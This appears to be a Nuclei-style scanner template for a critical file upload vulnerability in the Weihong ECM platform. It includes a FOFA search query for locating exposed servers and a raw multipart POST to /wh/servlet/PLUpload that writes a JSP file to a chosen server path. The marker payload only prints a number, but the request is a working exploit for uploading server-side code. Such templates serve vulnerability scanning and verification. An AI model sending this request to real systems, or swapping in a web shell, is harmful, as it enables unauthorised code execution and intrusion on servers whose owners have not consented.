id: weihong-ecm-plupload-file-upload

info:
  name: Weihong Ecm File Upload Vulnerability
  author: zp857
  severity: critical
  tags: weihong-ecm,fileupload
  metadata:
    fofa-query: 'body="wh/servlet" || body="ECM协同管理平台"'

requests:
  - raw:
      - |
        POST /wh/servlet/PLUpload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysIcyhDX3z70xOHUG
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36

        ------WebKitFormBoundarysIcyhDX3z70xOHUG
        Content-Disposition: form-data; name="filePath"

        D:\DOC_SERVER\file\news\t1.jsp
        ------WebKitFormBoundarysIcyhDX3z70xOHUG
        Content-Disposition: form-data; name="file"; filename="test.jsp"
        Content-Type: application/octet-stream

        <% out.println(857857); %>
        ------WebKitFormBoundarysIcyhDX3z70xOHUG--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200